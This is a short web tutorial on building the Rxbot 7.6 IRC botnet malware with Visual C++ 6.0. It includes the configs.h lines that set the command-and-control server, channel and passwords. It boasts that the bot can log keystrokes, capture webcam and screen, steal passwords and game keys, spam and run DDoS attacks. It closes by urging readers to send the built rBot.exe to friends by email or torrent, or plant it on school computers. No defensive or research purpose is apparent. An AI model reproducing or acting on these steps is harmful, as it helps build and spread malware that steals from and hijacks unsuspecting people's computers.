Home Steps to create a Botnet

Steps to create a Botnet


Hello friends, this tutorial will help you to Create a botnet using tools such as mIRC. You can download this tool from here or search it in Google or other websites.

As in Wikipedia,

A botnet is a collection of Internet-connected programs communicating with other similar programs in order to perform tasks. This can be as mundane as keeping control of an Internet Relay Chat (IRC) channel, or it could be used to send spam email or participate in distributed denial-of-service attacks.

In simple words, a Botnet works as a automated zombie that spreads throughout a computer and performs tasks such as Key-log their computer, take pictures of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, open websites, adds itself to registry etc.

Hence you can do anything with a bot, but just think carefully before doing something dangerous such as getting inside of an secure website. Below is a step by step tutorial to create a botnet:

Things to download :

  1. Download and install Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)
  2. Download and install the Service pack 6
  3. Download and install Windows SDK

Create a Botnet:

  1. Open up Microsoft Visual C++ Compilier 6.0
  2. Go to Tools > Options and Click the Directories tab
  3. Now, browse to these directories and add them to the list: (Click the dotted box to add)


  4. Make sure they’re in the order above (use the arrows to adjust the order)
  5. Download Rxbot 7.6
  6. Open the Rxbot 7.6 > configs.h folder and edit these lines only:

    Put in quotations:
    char password[] = Bot_login_pass; // bot password (Ex: monkey)
    char server[] = aenigma.gotd.org; // server (Ex: irc.efnet.net)
    char serverpass[] = ; // server password (not usually needed)
    char channel[] = #botz_channel; // channel that the bot should join
    char chanpass[] = My_channel_pass; // channel password

    char server2[] = ; // backup server
    char channel2[] = ; // backup channel
    char chanpass2[] = ; //Backup channel pass

  7. Make sure Microsoft Visual C++ is open
  8. Select File > Open Workspace
  9. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
  10. Right Click rBot Files and click Build:
  11. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!


Now your rBot is ready to run. Just sent it to your friends via torrent, yahoo, email or add it in school computers and see what happens.

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